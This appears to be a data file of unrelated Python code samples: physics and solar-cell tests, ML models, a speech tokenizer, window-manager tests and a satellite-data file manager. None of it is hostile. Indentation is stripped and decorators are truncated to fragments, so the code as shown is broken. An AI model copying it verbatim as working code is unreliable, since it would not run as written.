from solcore.solar_cell_solver import solar_cell_solver, SolarCell
from solcore.analytic_solar_cells import iv_depletion
from solcore.sesame_drift_diffusion.solve_pdd import iv_sesame
from solcore.sesame_drift_diffusion.process_structure import carrier_constants
from solcore.state import State
from solcore.light_source import LightSource
GaAs_p = material('GaAs')(T=300, Na=1e+24, hole_minority_lifetime=1e-06, electron_minority_lifetime=1e-06)
GaAs_n = material('GaAs')(T=300, Nd=1e+24, hole_minority_lifetime=1e-06, electron_minority_lifetime=1e-06)
GaAs_p.electron_diffusion_length = carrier_constants('electron_diffusion_length', GaAs_p)
GaAs_n.hole_diffusion_length = carrier_constants('hole_diffusion_length', GaAs_n)
options = State()
options.wavelength = (np.linspace(300, 950, 100) * 1e-09)
options.voltages = np.linspace((- 0.5), 1.3, 30)
options.internal_voltages = np.linspace((- 0.5), 1.3, 30)
options.T = 300
options.light_iv = True
options.light_source = LightSource(source_type='standard', version='AM1.5g', x=options.wavelength, output_units='photon_flux_per_m')
options.da_mode = 'green'
options.optics_method = 'TMM'
mesh = (np.linspace(0, 2200, 500) * 1e-09)
pn_junction = Junction([Layer(si('200nm'), GaAs_p, role='emitter'), Layer(si('2000nm'), GaAs_n, role='base')], kind='DA', R_shunt=0.1, mesh=mesh)
solar_cell_solver(SolarCell([pn_junction]), 'optics', options)
iv_depletion(pn_junction, options)
depletion_current = pn_junction.current
depletion_current_interp = pn_junction.iv(options.voltages)
iv_sesame(pn_junction, options)
sesame_current = pn_junction.current
sesame_current_interp = pn_junction.iv(options.voltages)
assert (depletion_current[0] == approx(sesame_current[0], rel=0.05))
assert (np.sign(depletion_current[(- 1)]) == np.sign(sesame_current[(- 1)]))
assert (depletion_current_interp[0] == approx(sesame_current_interp[0], rel=0.05))
assert (np.sign(depletion_current_interp[(- 1)]) == np.sign(sesame_current_interp[(- 1)]))
assert np.all((sesame_current == sesame_current_interp)) |
def compute_cost(num_spin_orbs: int, lambda_tot: float, num_sym_unique: int, kmesh: list[int], dE_for_qpe: float=0.0016, chi: int=10) -> ResourceEstimates:
init_cost = _compute_cost(num_spin_orbs, lambda_tot, num_sym_unique, dE_for_qpe, chi, 20000, *kmesh)
steps = init_cost[0]
final_cost = _compute_cost(num_spin_orbs, lambda_tot, num_sym_unique, dE_for_qpe, chi, steps, *kmesh)
estimates = ResourceEstimates(toffolis_per_step=final_cost[0], total_toffolis=final_cost[1], logical_qubits=final_cost[2])
return estimates |
def test_none_crown_at_list_crown(debug_ctx, debug_trail, acc_schema):
dumper_getter = make_dumper_getter(shape=shape(TestField('a', acc_schema.accessor_maker('a', True))), name_layout=OutputNameLayout(crown=OutListCrown([OutNoneCrown(placeholder=DefaultValue(None)), OutNoneCrown(placeholder=DefaultValue(SomeClass(2))), OutFieldCrown('a'), OutNoneCrown(placeholder=DefaultFactory(list))]), extra_move=None), debug_trail=debug_trail, debug_ctx=debug_ctx)
dumper = dumper_getter()
assert (dumper(acc_schema.dummy(a=1)) == [None, SomeClass(2), 1, []]) |
def postprocess_args(args):
ROOTDIR = args.root_dir
ft_file_map = {'vitbase': 'pth_vit_base_patch16_224_imagenet.hdf5', 'vitbase_r2rfte2e': 'pth_vit_base_patch16_224_imagenet_r2r.e2e.ft.22k.hdf5', 'vitbase_clip': 'pth_vit_base_patch32_224_clip.hdf5', 'clip16': 'CLIP-ViT-B-16-views.tsv'}
args.img_ft_file = os.path.join(ROOTDIR, 'R2R', 'features', ft_file_map[args.features])
args.connectivity_dir = os.path.join(ROOTDIR, 'R2R', 'connectivity')
args.scan_data_dir = os.path.join(ROOTDIR, 'Matterport3D', 'v1_unzip_scans')
if (args.dataset == 'rxr'):
args.anno_dir = os.path.join(ROOTDIR, 'RxR', 'annotations')
else:
args.anno_dir = os.path.join(ROOTDIR, 'R2R', 'annotations')
args.ckpt_dir = os.path.join(args.output_dir, 'ckpts')
args.log_dir = os.path.join(args.output_dir, 'logs')
args.pred_dir = os.path.join(args.output_dir, 'preds')
os.makedirs(args.output_dir, exist_ok=True)
os.makedirs(args.ckpt_dir, exist_ok=True)
os.makedirs(args.log_dir, exist_ok=True)
os.makedirs(args.pred_dir, exist_ok=True)
if (args.dataset != 'rxr'):
del args.langs
return args |
def l2_lgr_schema(settings=None):
settings = (settings or {})
ngrps = settings.get('num_groups', 120)
return {'providers': settings.get('providers', {}), 'variable_path': settings.get('variable_path', ''), 'dimensions': {'groups': ngrps}, 'variables': {'latitude': {'format': 'f4', 'shape': ('groups',), 'long_name': 'Latitude of group', 'units': 'degrees_north', 'default_data': (lambda : np.linspace((- 90), 90, ngrps))}, 'longitude': {'format': 'f4', 'shape': ('groups',), 'long_name': 'Longitude of group', 'units': 'degrees_east', 'default_data': (lambda : np.linspace((- 180), 80, ngrps))}}} |
def read_emc(root_path):
emc = {}
if os.path.isdir((root_path + '/debug/bpmp/debug/clk/emc')):
path = (root_path + '/debug/bpmp/debug/clk/emc')
if os.access((path + '/rate'), os.R_OK):
with open((path + '/rate'), 'r') as f:
emc['cur'] = (int(f.read()) // 1000)
if os.access((path + '/max_rate'), os.R_OK):
with open((path + '/max_rate'), 'r') as f:
emc['max'] = (int(f.read()) // 1000)
if os.access((path + '/min_rate'), os.R_OK):
with open((path + '/min_rate'), 'r') as f:
emc['min'] = (int(f.read()) // 1000)
if os.access((path + '/mrq_rate_locked'), os.R_OK):
with open((path + '/mrq_rate_locked'), 'r') as f:
emc['override'] = (int(f.read()) // 1000)
elif os.path.isdir((root_path + '/debug/tegra_bwmgr')):
path = (root_path + '/debug/clk/override.emc')
if os.access((path + '/clk_rate'), os.R_OK):
with open((path + '/clk_rate'), 'r') as f:
emc['cur'] = (int(f.read()) // 1000)
if os.access((path + '/clk_state'), os.R_OK):
with open((path + '/clk_state'), 'r') as f:
emc['override'] = (int(f.read()) // 1000)
path = (root_path + '/tegra_bwmgr')
if os.access((path + '/emc_max_rate'), os.R_OK):
with open((path + '/emc_max_rate'), 'r') as f:
emc['max'] = (int(f.read()) // 1000)
if os.access((path + '/emc_min_rate'), os.R_OK):
with open((path + '/emc_min_rate'), 'r') as f:
emc['min'] = (int(f.read()) // 1000)
elif os.path.isdir((root_path + '/clk/emc')):
emc = read_engine((root_path + '/clk/emc'))
emc_cap = 0
if os.access((root_path + '/nvpmodel_emc_cap/emc_iso_cap'), os.R_OK):
with open((root_path + '/nvpmodel_emc_cap/emc_iso_cap'), 'r') as f:
emc_cap = (int(f.read()) // 1000)
if ('max' in emc):
if ((emc_cap > 0) and (emc_cap < emc['max'])):
emc['max'] = emc_cap
return emc |
_config
def test_select_group(manager):
group = manager.c.group
assert (group.layout.info()['group'] == 'a')
assert (len(group.layout.info()['stacks']) == 1)
assert (len(group.layout[2].info()['stacks']) == 3)
with pytest.raises(CommandError):
manager.c.group.window.info()
manager.test_window('test')
wid = manager.c.window.info()['id']
assert (group.window.info()['id'] == wid)
assert (group.window[wid].info()['id'] == wid)
with pytest.raises(libqtile.command.client.SelectError, match='Item not available in object'):
group.window['foo']
assert (group.screen.info()['index'] == 0)
assert (group['b'].screen.info()['index'] == 1)
with pytest.raises(libqtile.command.client.SelectError, match='Item not available in object'):
group.screen[0] |
class Migration(migrations.Migration):
dependencies = [('accounts', '0002_move_defaults')]
operations = [migrations.CreateModel(name='DefaultAccount', fields=[], options={'proxy': True}, bases=('accounts.accountdb',)), migrations.CreateModel(name='DefaultGuest', fields=[], options={'proxy': True}, bases=('accounts.defaultaccount',)), migrations.AlterModelOptions(name='accountdb', options={'verbose_name': 'Account'})] |
def testActiveComps(run_cli, backends):
bz = _open_bz(REDHAT_URL, **backends)
out = run_cli("bugzilla info --components 'Virtualization Tools' --active-components", bz)
assert ('virtinst' not in out)
out = run_cli("bugzilla info --component_owners 'Virtualization Tools' --active-components", bz)
assert ('virtinst' not in out) |
def gen_seq_masks(seq_lens, max_len=None):
if (max_len is None):
max_len = max(seq_lens)
batch_size = len(seq_lens)
device = seq_lens.device
masks = torch.arange(max_len).unsqueeze(0).repeat(batch_size, 1).to(device)
masks = (masks < seq_lens.unsqueeze(1))
return masks |
class Wav2Vec2PhonemeCTCTokenizer(PreTrainedTokenizer):
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ['input_ids', 'attention_mask']
def __init__(self, vocab_file, bos_token='<s>', eos_token='</s>', unk_token='<unk>', pad_token='<pad>', phone_delimiter_token=' ', word_delimiter_token=None, do_phonemize=True, phonemizer_lang='en-us', phonemizer_backend='espeak', **kwargs):
super().__init__(unk_token=unk_token, bos_token=bos_token, eos_token=eos_token, pad_token=pad_token, word_delimiter_token=word_delimiter_token, phone_delimiter_token=phone_delimiter_token, do_phonemize=do_phonemize, phonemizer_lang=phonemizer_lang, phonemizer_backend=phonemizer_backend, **kwargs)
self._word_delimiter_token = word_delimiter_token
self._phone_delimiter_token = phone_delimiter_token
self.do_phonemize = do_phonemize
self.phonemizer_lang = phonemizer_lang
self.phonemizer_backend = phonemizer_backend
if do_phonemize:
self.init_backend(self.phonemizer_lang)
with open(vocab_file, encoding='utf-8') as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for (k, v) in self.encoder.items()}
def vocab_size(self) -> int:
return len(self.decoder)
def get_vocab(self) -> Dict:
return dict(self.encoder, **self.added_tokens_encoder)
def init_backend(self, phonemizer_lang: str):
requires_backends(self, 'phonemizer')
from phonemizer.backend import BACKENDS
self.backend = BACKENDS[self.phonemizer_backend](phonemizer_lang, language_switch='remove-flags')
def prepare_for_tokenization(self, text: str, is_split_into_words: bool=False, phonemizer_lang: Optional[str]=None, do_phonemize: Optional[bool]=None) -> Tuple[(str, Dict[(str, Any)])]:
if is_split_into_words:
text = (' ' + text)
if (do_phonemize is not None):
self.do_phonemize = do_phonemize
if (phonemizer_lang is not None):
self.phonemizer_lang = phonemizer_lang
self.init_backend(phonemizer_lang)
return (text, {})
def _tokenize(self, text, **kwargs):
text = text.strip()
if self.do_phonemize:
text = text.lower()
text = self.phonemize(text, self.phonemizer_lang)
tokens = text.split(' ')
tokens = list(filter((lambda p: (p.strip() != '')), tokens))
return tokens
def phonemize(self, text: str, phonemizer_lang: Optional[str]=None) -> str:
from phonemizer.separator import Separator
word_delimiter = ((self.word_delimiter_token + ' ') if (self.word_delimiter_token is not None) else '')
if ((phonemizer_lang is not None) and (phonemizer_lang != self.phonemizer_lang)):
self.init_backend(phonemizer_lang)
else:
phonemizer_lang = self.phonemizer_lang
separator = Separator(phone=self.phone_delimiter_token, word=word_delimiter, syllable='')
phonemes = self.backend.phonemize([text], separator=separator)
phonemes = phonemes[0].strip()
return phonemes
def word_delimiter_token(self) -> str:
if ((self._word_delimiter_token is None) and self.verbose):
return None
return str(self._word_delimiter_token)
def word_delimiter_token_id(self) -> Optional[int]:
if (self._word_delimiter_token is None):
return None
return self.convert_tokens_to_ids(self.word_delimiter_token)
_delimiter_token.setter
def word_delimiter_token(self, value):
self._word_delimiter_token = value
_delimiter_token_id.setter
def word_delimiter_token_id(self, value):
self._word_delimiter_token = self.convert_tokens_to_ids(value)
def phone_delimiter_token(self) -> str:
if ((self._phone_delimiter_token is None) and self.verbose):
logger.error('Using phone_delimiter_token, but it is not set yet.')
return None
return str(self._phone_delimiter_token)
def phone_delimiter_token_id(self) -> Optional[int]:
if (self._phone_delimiter_token is None):
return None
return self.convert_tokens_to_ids(self.phone_delimiter_token)
_delimiter_token.setter
def phone_delimiter_token(self, value):
self._phone_delimiter_token = value
_delimiter_token_id.setter
def phone_delimiter_token_id(self, value):
self._phone_delimiter_token = self.convert_tokens_to_ids(value)
def _convert_token_to_id(self, token: str) -> int:
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index: int) -> str:
result = self.decoder.get(index, self.unk_token)
return result
def convert_tokens_to_string(self, tokens: List[str], group_tokens: bool=True, spaces_between_special_tokens: bool=False, filter_word_delimiter_token: bool=True, output_char_offsets: bool=False) -> str:
if group_tokens:
(chars, char_repetitions) = zip(*((token, len(list(group_iter))) for (token, group_iter) in groupby(tokens)))
else:
chars = tokens
char_repetitions = (len(tokens) * [1])
processed_chars = list(filter((lambda char: (char != self.pad_token)), chars))
if (filter_word_delimiter_token and (self.word_delimiter_token is not None)):
processed_chars = list(filter((lambda token: (token != self.word_delimiter_token)), processed_chars))
char_offsets = None
if output_char_offsets:
word_delimiter_token_for_offsets = (self.word_delimiter_token if (filter_word_delimiter_token is True) else None)
char_offsets = self._compute_offsets(char_repetitions, chars, self.pad_token, word_delimiter_token=word_delimiter_token_for_offsets)
if (len(char_offsets) != len(processed_chars)):
raise ValueError(f'`char_offsets`: {char_offsets} and `processed_tokens`: {processed_chars} have to be of the same length, but are: `len(offsets)`: {len(char_offsets)} and `len(processed_tokens)`: {len(processed_chars)}')
for (i, char) in enumerate(processed_chars):
char_offsets[i]['char'] = char
string = ' '.join(processed_chars).strip()
return {'text': string, 'char_offsets': char_offsets}
def _compute_offsets(char_repetitions: List[int], chars: List[str], ctc_token: int, word_delimiter_token: Optional[int]=None) -> List[Dict[(str, Union[(str, int)])]]:
end_indices = np.asarray(char_repetitions).cumsum()
start_indices = np.concatenate(([0], end_indices[:(- 1)]))
offsets = [{'char': t, 'start_offset': s, 'end_offset': e} for (t, s, e) in zip(chars, start_indices, end_indices)]
offsets = list(filter((lambda offsets: (offsets['char'] != ctc_token)), offsets))
if (word_delimiter_token is not None):
offsets = list(filter((lambda offsets: (offsets['char'] != word_delimiter_token)), offsets))
return offsets
def _decode(self, token_ids: List[int], skip_special_tokens: bool=False, clean_up_tokenization_spaces: bool=True, group_tokens: bool=True, filter_word_delimiter_token: bool=True, spaces_between_special_tokens: bool=False, output_char_offsets: bool=False) -> str:
filtered_tokens = self.convert_ids_to_tokens(token_ids, skip_special_tokens=skip_special_tokens)
result = []
for token in filtered_tokens:
if (skip_special_tokens and (token in self.all_special_ids)):
continue
result.append(token)
string_output = self.convert_tokens_to_string(result, group_tokens=group_tokens, spaces_between_special_tokens=spaces_between_special_tokens, filter_word_delimiter_token=filter_word_delimiter_token, output_char_offsets=output_char_offsets)
text = string_output['text']
if clean_up_tokenization_spaces:
text = self.clean_up_tokenization(text)
if output_char_offsets:
return Wav2Vec2PhonemeCTCTokenizerOutput(text=text, char_offsets=string_output['char_offsets'])
else:
return text
def decode(self, token_ids: Union[(int, List[int], 'np.ndarray', 'torch.Tensor', 'tf.Tensor')], skip_special_tokens: bool=False, clean_up_tokenization_spaces: bool=True, output_char_offsets: bool=False, **kwargs) -> str:
token_ids = to_py_obj(token_ids)
return self._decode(token_ids=token_ids, skip_special_tokens=skip_special_tokens, clean_up_tokenization_spaces=clean_up_tokenization_spaces, output_char_offsets=output_char_offsets, **kwargs)
def batch_decode(self, sequences: Union[(List[int], List[List[int]], 'np.ndarray', 'torch.Tensor', 'tf.Tensor')], skip_special_tokens: bool=False, clean_up_tokenization_spaces: bool=True, output_char_offsets: bool=False, **kwargs) -> List[str]:
batch_decoded = [self.decode(seq, skip_special_tokens=skip_special_tokens, clean_up_tokenization_spaces=clean_up_tokenization_spaces, output_char_offsets=output_char_offsets, **kwargs) for seq in sequences]
if output_char_offsets:
return Wav2Vec2PhonemeCTCTokenizerOutput({k: [d[k] for d in batch_decoded] for k in batch_decoded[0]})
return batch_decoded
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str]=None) -> Tuple[str]:
if (not os.path.isdir(save_directory)):
logger.error(f'Vocabulary path ({save_directory}) should be a directory')
return
vocab_file = os.path.join(save_directory, (((filename_prefix + '-') if filename_prefix else '') + VOCAB_FILES_NAMES['vocab_file']))
with open(vocab_file, 'w', encoding='utf-8') as f:
f.write((json.dumps(self.encoder, indent=2, sort_keys=True, ensure_ascii=False) + '\n'))
return (vocab_file,)
def _add_tokens(self, new_tokens: Union[(List[str], List[AddedToken])], special_tokens: bool=False) -> int:
new_tokens = [str(tok) for tok in new_tokens]
tokens_to_add = []
for token in new_tokens:
if (not isinstance(token, str)):
raise ValueError(f'Token {token} has to be of type string, but is of type {type(token)}.')
assert isinstance(token, str)
if ((token != self.unk_token) and (self.convert_tokens_to_ids(token) == self.convert_tokens_to_ids(self.unk_token)) and (token not in tokens_to_add)):
tokens_to_add.append(token)
if self.verbose:
logger.info(f'Adding {token} to the vocabulary')
added_tok_encoder = {tok: (len(self) + i) for (i, tok) in enumerate(tokens_to_add)}
added_tok_decoder = {v: k for (k, v) in added_tok_encoder.items()}
self.added_tokens_encoder.update(added_tok_encoder)
self.added_tokens_decoder.update(added_tok_decoder)
for token in tokens_to_add:
if (len(token) > 1):
self._additional_special_tokens.append(AddedToken(token))
_insert_one_token_to_ordered_list(self.unique_no_split_tokens, token)
self._create_trie(self.unique_no_split_tokens)
return len(tokens_to_add) |
.parametrize('v', [set_test_value(ps.float64(), np.array(1.0, dtype='float64'))])
def test_TensorFromScalar(v):
g = ptb.TensorFromScalar()(v)
g_fg = FunctionGraph(outputs=[g])
compare_numba_and_py(g_fg, [i.tag.test_value for i in g_fg.inputs if (not isinstance(i, (SharedVariable, Constant)))]) |
class BehavioralRTLIRGeneratorL3(BehavioralRTLIRGeneratorL2):
def visit_Call(s, node):
obj = s.get_call_obj(node)
if is_bitstruct_class(obj):
fields = obj.__bitstruct_fields__
nargs = len(node.args)
nfields = len(fields.keys())
if (nargs == 0):
inst = obj()
values = [s._datatype_to_bir(getattr(inst, field)) for field in fields.keys()]
else:
if (nargs != nfields):
raise PyMTLSyntaxError(s.blk, node, f'BitStruct {obj.__name__} has {nfields} fields but {nargs} arguments are given!')
values = [s.visit(arg) for arg in node.args]
ret = bir.StructInst(obj, values)
ret.ast = node
return ret
else:
return super().visit_Call(node)
def _datatype_to_bir(s, instance):
if isinstance(instance, Bits):
return s._bits_to_bir(instance)
elif is_bitstruct_inst(instance):
return s._struct_to_bir(instance)
else:
assert False, f'unrecognized datatype instance {instance}'
def _struct_to_bir(s, instance):
struct_cls = instance.__class__
fields = struct_cls.__bitstruct_fields__.keys()
values = [s._datatype_to_bir(getattr(instance, field)) for field in fields]
return bir.StructInst(struct_cls, values)
def _bits_to_bir(s, instance):
nbits = instance.nbits
value = int(instance)
return bir.SizeCast(nbits, bir.Number(value)) |
def discriminator_loss_func(real_pred, fake_pred, real_pred_edge, fake_pred_edge, edge):
criterion = nn.BCELoss()
real_target = torch.tensor(1.0).expand_as(real_pred)
fake_target = torch.tensor(0.0).expand_as(fake_pred)
if torch.cuda.is_available():
real_target = real_target.cuda()
fake_target = fake_target.cuda()
loss_adversarial = (((criterion(real_pred, real_target) + criterion(fake_pred, fake_target)) + criterion(real_pred_edge, edge)) + criterion(fake_pred_edge, edge))
return {'loss_adversarial': loss_adversarial.mean()} |
def _gen_docx_contract(output, contract, **context):
context = _contract_context(contract, **context)
renewal = context['renewal']
if renewal:
template = os.path.join(settings.TEMPLATES_DIR, 'sponsors', 'admin', 'renewal-contract-template.docx')
else:
template = os.path.join(settings.TEMPLATES_DIR, 'sponsors', 'admin', 'contract-template.docx')
doc = DocxTemplate(template)
doc.render(context)
doc.save(output)
return output |
def _afd_helper_handle() -> Handle:
rawname = ('\\\\.\\GLOBALROOT\\Device\\Afd\\Trio'.encode('utf-16le') + b'\x00\x00')
rawname_buf = ffi.from_buffer(rawname)
handle = kernel32.CreateFileW(ffi.cast('LPCWSTR', rawname_buf), FileFlags.SYNCHRONIZE, (FileFlags.FILE_SHARE_READ | FileFlags.FILE_SHARE_WRITE), ffi.NULL, FileFlags.OPEN_EXISTING, FileFlags.FILE_FLAG_OVERLAPPED, ffi.NULL)
if (handle == INVALID_HANDLE_VALUE):
raise_winerror()
return handle |
def print_commands(prefix: str, obj: CommandClient) -> None:
prefix += ' -f '
cmds = obj.call('commands')
output = []
for cmd in cmds:
doc_args = get_formated_info(obj, cmd)
pcmd = (prefix + cmd)
output.append([pcmd, doc_args])
max_cmd = max((len(pcmd) for (pcmd, _) in output))
formatting = ('{:<%d}\t{}' % (max_cmd + 1))
for line in output:
print(formatting.format(line[0], line[1])) |
class CoordConv(nn.Module):
def __init__(self, input_nc, output_nc, with_r=False, use_spect=False, **kwargs):
super(CoordConv, self).__init__()
self.addcoords = AddCoords(with_r=with_r)
input_nc = (input_nc + 2)
if with_r:
input_nc = (input_nc + 1)
self.conv = spectral_norm(nn.Conv2d(input_nc, output_nc, **kwargs), use_spect)
def forward(self, x):
ret = self.addcoords(x)
ret = self.conv(ret)
return ret |
def compressed_all_to_all(output, input, group=None):
world_size = dist.get_world_size(group)
rank = torch.distributed.get_rank(group)
ts_in = torch.tensor_split(input, world_size)
(compressed_a2a_input, _) = dg_compress(ts_in)
ts_out = torch.tensor_split(output, world_size)
for i in range(world_size):
if (i != rank):
torch.distributed.send(compressed_a2a_input[i], i)
torch.distributed.recv(compressed_a2a_input[i], i)
dg_decompress(compressed_a2a_input, ts_out) |
class ClusterNet5gTrunk(ResNetTrunk):
def __init__(self, config):
super(ClusterNet5gTrunk, self).__init__()
self.batchnorm_track = config.batchnorm_track
block = BasicBlock
layers = [3, 4, 6, 3]
in_channels = config.in_channels
self.inplanes = 64
self.conv1 = nn.Conv2d(in_channels, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(64, track_running_stats=self.batchnorm_track)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
if (config.input_sz == 96):
avg_pool_sz = 7
elif (config.input_sz == 64):
avg_pool_sz = 5
elif (config.input_sz == 32):
avg_pool_sz = 3
print(('avg_pool_sz %d' % avg_pool_sz))
self.avgpool = nn.AvgPool2d(avg_pool_sz, stride=1)
def forward(self, x, penultimate_features=False):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
if (not penultimate_features):
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), (- 1))
return x |
class NormalResnetBackbone(nn.Module):
def __init__(self, orig_resnet):
super(NormalResnetBackbone, self).__init__()
self.num_features = 2048
self.prefix = orig_resnet.prefix
self.maxpool = orig_resnet.maxpool
self.layer1 = orig_resnet.layer1
self.layer2 = orig_resnet.layer2
self.layer3 = orig_resnet.layer3
self.layer4 = orig_resnet.layer4
def get_num_features(self):
return self.num_features
def forward(self, x):
tuple_features = list()
x = self.prefix(x)
x = self.maxpool(x)
x = self.layer1(x)
tuple_features.append(x)
x = self.layer2(x)
tuple_features.append(x)
x = self.layer3(x)
tuple_features.append(x)
x = self.layer4(x)
tuple_features.append(x)
return tuple_features |
class Files(object):
def __init__(self, inst, data_dir=None, directory_format=None, update_files=False, file_format=None, write_to_disk=True, ignore_empty_files=False):
self.update_files = update_files
self.home_path = os.path.join(pysat.pysat_dir, 'instruments')
self.start_date = None
self.stop_date = None
self.files = pds.Series(None, dtype='object')
self.inst_info = {'platform': inst.platform, 'name': inst.name, 'tag': inst.tag, 'inst_id': inst.inst_id, 'inst_module': inst.inst_module, 'inst': weakref.proxy(inst)}
self.multi_file_day = inst.multi_file_day
self.list_files_creator = None
self.stored_file_name = '_'.join((self.inst_info['platform'], self.inst_info['name'], self.inst_info['tag'], self.inst_info['inst_id'], 'stored_file_info.txt'))
if (directory_format is None):
directory_format = pysat.params['directory_format']
self.directory_format = directory_format
self.file_format = file_format
self.sub_dir_path = os.path.normpath(self.directory_format.format(**self.inst_info))
if (len(pysat.params['data_dirs']) == 0):
raise NameError(' '.join(("pysat's `data_dirs` hasn't been set.", 'Please set a top-level directory', 'path to store data using', "`pysat.params['data_dirs'] = path`")))
self.data_paths = [os.path.join(pdir, self.sub_dir_path) for pdir in pysat.params['data_dirs']]
if (data_dir is not None):
self.data_paths.insert(0, data_dir)
self.data_paths.insert(0, os.path.join(data_dir, self.sub_dir_path))
self.data_paths = [os.path.join(os.path.normpath(pdir), '') for pdir in self.data_paths]
self.data_path = self.data_paths[0]
self.write_to_disk = write_to_disk
if (not self.write_to_disk):
self._previous_file_list = pds.Series([], dtype='a')
self._current_file_list = pds.Series([], dtype='a')
self.ignore_empty_files = ignore_empty_files
if (self.inst_info['platform'] != ''):
if self.update_files:
self.refresh()
else:
file_info = self._load()
if file_info.empty:
self.refresh()
else:
self._attach_files(file_info)
return
def __repr__(self):
inst_repr = self.inst_info['inst'].__repr__()
out_str = ''.join(['pysat.Files(', inst_repr, ', directory_format=', "'{:}'".format(self.directory_format), ', update_files=', '{:}, file_format='.format(self.update_files), '{:}, '.format(self.file_format.__repr__()), 'write_to_disk={:}, '.format(self.write_to_disk), 'ignore_empty_files=', '{:})'.format(self.ignore_empty_files)])
return out_str
def __str__(self):
num_files = len(self.files)
output_str = 'Local File Statistics\n'
output_str += '\n'
output_str += 'Number of files: {:d}\n'.format(num_files)
if (num_files > 0):
output_str += 'Date Range: '
output_str += self.files.index[0].strftime('%d %B %Y')
output_str += ' --- '
output_str += self.files.index[(- 1)].strftime('%d %B %Y')
return output_str
def __eq__(self, other):
if (not isinstance(other, self.__class__)):
return False
checks = []
key_check = []
for key in self.__dict__.keys():
key_check.append(key)
if (key in other.__dict__.keys()):
if (key not in ['files', '_previous_file_list', '_current_file_list', 'inst_info']):
test = np.all((self.__dict__[key] == other.__dict__[key]))
checks.append(test)
elif (key not in ['inst_info']):
try:
check = np.all((self.__dict__[key] == other.__dict__[key]))
checks.append(check)
except ValueError:
return False
elif (key == 'inst_info'):
ichecks = []
for ii_key in self.inst_info.keys():
if (ii_key != 'inst'):
ichecks.append((self.inst_info[ii_key] == other.inst_info[ii_key]))
else:
try:
oinst = other.inst_info[ii_key]
ichecks.append((str(self.inst_info[ii_key]) == str(oinst)))
except AttributeError:
return False
checks.append(np.all(ichecks))
else:
return False
for key in other.__dict__.keys():
if (key not in self.__dict__.keys()):
return False
test_data = np.all(checks)
return test_data
def __getitem__(self, key):
if (self.list_files_creator is not None):
out = self.list_files_creator(key)
elif isinstance(key, slice):
try:
try:
out = self.files.iloc[key]
except TypeError:
out = self.files.loc[key]
except IndexError as err:
raise IndexError(''.join((str(err), '\n', 'Date requested outside file ', 'bounds.')))
if isinstance(key.start, dt.datetime):
if (len(out) > 1):
if (out.index[(- 1)] >= key.stop):
out = out[:(- 1)]
elif (len(out) == 1):
if (out.index[0] >= key.stop):
out = pds.Series([], dtype='a')
else:
try:
out = self.files.iloc[key]
except TypeError:
out = self.files.loc[key]
return out
def _filter_empty_files(self, path):
keep_index = []
for (i, fname) in enumerate(self.files):
full_fname = os.path.join(path, fname)
if os.path.isfile(full_fname):
if (os.path.getsize(full_fname) > 0):
keep_index.append(i)
dropped_num = (len(self.files.index) - len(keep_index))
if (dropped_num > 0):
dstr = ' '.join(('Removing {:d}'.format(dropped_num), 'empty files from Instrument list.'))
pysat.logger.warning(dstr)
self.files = self.files.iloc[keep_index]
return
def _attach_files(self, files_info):
if (not files_info.empty):
self.files = files_info
self._ensure_unique_file_datetimes()
if self.ignore_empty_files:
self._filter_empty_files(path=self.data_path)
if (not self.files.empty):
self.start_date = filter_datetime_input(self.files.index[0])
self.stop_date = filter_datetime_input(self.files.index[(- 1)])
else:
self.start_date = None
self.stop_date = None
else:
self.start_date = None
self.stop_date = None
self.files = files_info.astype(np.dtype('O'))
return
def _ensure_unique_file_datetimes(self):
unique_files = (len(self.files.index.unique()) == len(self.files))
if ((not self.multi_file_day) and (not unique_files)):
estr = ''.join(['Duplicate datetimes in stored filename ', 'information.\nKeeping one of each ', 'of the duplicates, dropping the rest. ', 'Please ensure the file datetimes ', 'are unique at the microsecond level.'])
pysat.logger.warning(estr)
ind = self.files.index.duplicated()
pysat.logger.warning(self.files.index[ind].unique())
idx = np.unique(self.files.index, return_index=True)
self.files = self.files.iloc[idx[1]]
return
def _store(self):
stored_name = self.stored_file_name
stored_files = self._load(update_path=False)
if (len(stored_files) != len(self.files)):
new_flag = True
elif stored_files.eq(self.files).all():
new_flag = False
else:
new_flag = True
if new_flag:
if self.write_to_disk:
prev_name = os.path.join(self.home_path, 'archive', stored_name)
stored_files.to_csv(prev_name, date_format='%Y-%m-%d %H:%M:%S.%f', header=[self.data_path])
self.files.to_csv(os.path.join(self.home_path, stored_name), date_format='%Y-%m-%d %H:%M:%S.%f', header=[self.data_path])
else:
self._previous_file_list = stored_files
self._current_file_list = self.files.copy()
return
def _load(self, prev_version=False, update_path=True):
fname = self.stored_file_name
if prev_version:
fname = os.path.join(self.home_path, 'archive', fname)
else:
fname = os.path.join(self.home_path, fname)
if (os.path.isfile(fname) and (os.path.getsize(fname) > 0)):
if self.write_to_disk:
loaded = pds.read_csv(fname, index_col=0, parse_dates=True, header=0).squeeze('columns')
if update_path:
if (loaded.name in self.data_paths):
dstr = ' '.join(['Assigning `data_path` found', 'in stored file list:', loaded.name])
pysat.logger.debug(dstr)
self.data_path = loaded.name
else:
dstr = ' '.join(['`data_path` found', 'in stored file list is not in', 'current supported `self.data_paths`.', 'Ignoring stored path:', loaded.name, 'Clearing out stored files as well.'])
pysat.logger.debug(dstr)
loaded = pds.Series([], dtype='a')
loaded.name = None
return loaded
elif prev_version:
return self._previous_file_list
else:
return self._current_file_list
else:
return pds.Series([], dtype='a')
return
def _remove_data_dir_path(self, file_series=None):
out = None
if (file_series is not None):
split_str = os.path.join(self.data_path, '')
out = file_series.apply((lambda x: x.split(split_str)[(- 1)]))
return out
def copy(self):
saved_info = self.inst_info
